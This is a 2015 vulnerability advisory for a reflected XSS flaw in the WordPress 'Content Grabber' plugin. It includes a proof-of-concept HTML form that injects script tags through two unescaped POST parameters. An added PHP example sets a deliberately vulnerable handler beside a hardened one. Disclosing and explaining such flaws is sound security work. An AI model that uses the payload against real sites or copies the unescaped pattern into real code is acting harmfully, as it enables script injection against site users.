Title: WordPress 'Content Grabber' Plugin 
Version: 1.0
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-14
Download: 
- https://wordpress.org/plugins/content-grabber/
- https://plugins.svn.wordpress.org/content-grabber/
Notified WordPress: 2015-06-21
==========================================================

## Plugin description
==========================================================
A plugin to help you grab content of any post type and display them as you want

## Vulnerabilities
==========================================================
Two POST parameters (obj_field_name and obj_field_id) are echoed into the response unescaped when the 'get_terms_taxonomies' action is executed via wp-admin/admin-ajax.php. Because the reflected values land inside HTML attributes, a value that closes the attribute (a double quote followed by >) is rendered as markup, giving reflected cross-site scripting (XSS). The PoC below is run from an administrator session.

PoC: 

Log in as admin, replace [URL] with the site's base URL, and submit the following form. The &quot; entities decode to a literal double quote when the form is submitted, so each value closes the attribute it is echoed into before the <script> tag:

<form method="POST" action="[URL]/wp-admin/admin-ajax.php">
    <input type="text" name="action" value="get_terms_taxonomies"><br />
    <input type="text" name="post_type" value="post"><br />
    <!-- both values below close the surrounding attribute and inject a script element -->
    <input type="text" name="obj_field_name" value="widget-cg_content_grabber[3][cat_id]&quot;><script>alert(1)</script>"><br />
    <input type="text" name="obj_field_id" value="widget-cg_content_grabber-3-cat_id&quot;><script>alert(2)</script>"><br />
    <input type="text" name="cat_id_array" value="[&quot;1&quot;]"><br />
    <input type="submit">
</form>
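The following is an added example, not the plugin's code (the plugin's source is not reproduced in this advisory): a hypothetical reconstruction of the output pattern the advisory describes, an admin-ajax handler that interpolates the two POST parameters straight into attribute values, placed next to a hardened version that allow-lists the identifiers and escapes every value at the point of output with WordPress's esc_attr()/esc_html(). The function names, the nonce action name 'cg_terms_nonce', the select markup and the sample term list are assumptions; only the POST parameter names and the PoC values come from the advisory. When run from the CLI outside WordPress, minimal substitutes for the WordPress helpers are defined so the comparison can be seen directly.

```php
<?php
// Added example, not the Content Grabber plugin's own code.
// Stand-alone substitutes, used only when WordPress is not loaded.
if (!function_exists('esc_attr')) {
    // esc_attr()/esc_html() in WordPress amount to HTML-special-character
    // encoding with quotes encoded, which is what an attribute value needs.
    function esc_attr($text) { return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); }
}
if (!function_exists('esc_html')) {
    function esc_html($text) { return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8'); }
}

/**
 * Vulnerable pattern (hypothetical reconstruction): obj_field_name and
 * obj_field_id are concatenated into attribute values unescaped, so a value
 * containing "> closes the attribute and the rest is parsed as markup.
 */
function cg_render_terms_select_vulnerable(array $post, array $terms) {
    $html = '<select name="' . $post['obj_field_name'] . '" id="' . $post['obj_field_id'] . '">';
    foreach ($terms as $term_id => $label) {
        $html .= '<option value="' . (int) $term_id . '">' . $label . '</option>';
    }
    return $html . '</select>';
}

/**
 * Hardened version: reject identifiers that do not match the shape the
 * widget form fields actually take (widget-...[n][field] for the name,
 * widget-...-n-field for the id), then escape everything on output anyway,
 * so the page stays safe even if the allow-list is later loosened.
 */
function cg_render_terms_select_hardened(array $post, array $terms) {
    $name = isset($post['obj_field_name']) ? (string) $post['obj_field_name'] : '';
    $id   = isset($post['obj_field_id'])   ? (string) $post['obj_field_id']   : '';

    // Allow-lists (assumed shapes): letters, digits, _ - and [] for the name; no [] for the id.
    if (!preg_match('/^[A-Za-z0-9_\-\[\]]{1,100}$/', $name) || !preg_match('/^[A-Za-z0-9_\-]{1,100}$/', $id)) {
        return ''; // reject unexpected input rather than try to repair it
    }

    $html = '<select name="' . esc_attr($name) . '" id="' . esc_attr($id) . '">';
    foreach ($terms as $term_id => $label) {
        $html .= '<option value="' . (int) $term_id . '">' . esc_html($label) . '</option>';
    }
    return $html . '</select>';
}

// Inside WordPress, action=get_terms_taxonomies is served by the
// wp_ajax_get_terms_taxonomies hook. A privileged admin-ajax endpoint should
// also verify a nonce and a capability before rendering anything; the nonce
// action name 'cg_terms_nonce' is an assumption for this example.
if (function_exists('add_action')) {
    add_action('wp_ajax_get_terms_taxonomies', function () {
        check_ajax_referer('cg_terms_nonce', 'nonce');      // dies on a missing/invalid nonce
        if (!current_user_can('edit_theme_options')) {     // capability that governs widget editing
            wp_die('', '', array('response' => 403));
        }
        $terms = array(1 => 'Uncategorized');              // real code would call get_terms()
        echo cg_render_terms_select_hardened($_POST, $terms);
        wp_die();
    });
}

// Stand-alone demonstration using the advisory's PoC values (constructed input;
// the &quot; entities of the HTML form arrive as literal double quotes).
if (PHP_SAPI === 'cli' && !function_exists('add_action')) {
    $terms = array(1 => 'Uncategorized');
    $poc = array(
        'obj_field_name' => 'widget-cg_content_grabber[3][cat_id]"><script>alert(1)</script>',
        'obj_field_id'   => 'widget-cg_content_grabber-3-cat_id"><script>alert(2)</script>',
    );
    $benign = array(
        'obj_field_name' => 'widget-cg_content_grabber[3][cat_id]',
        'obj_field_id'   => 'widget-cg_content_grabber-3-cat_id',
    );
    echo "vulnerable (script element reaches the page):\n  ", cg_render_terms_select_vulnerable($poc, $terms), "\n";
    echo "hardened, PoC input (rejected, empty string):\n  ", var_export(cg_render_terms_select_hardened($poc, $terms), true), "\n";
    echo "hardened, benign input (escaped normally):\n  ", cg_render_terms_select_hardened($benign, $terms), "\n";
}
```

Run with `php example.php` to see the three outputs side by side. The two defences are independent: the allow-list stops the PoC values at the door, and esc_attr()/esc_html() would still neutralise a double quote or angle bracket that got past it, which is why output escaping belongs at the echo and not only in an earlier validation step.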

## Solution
==========================================================
No fix available at the time of writing.

==========================================================
Vulnerabilities found using Eir, an early-stage static vulnerability scanner for PHP applications.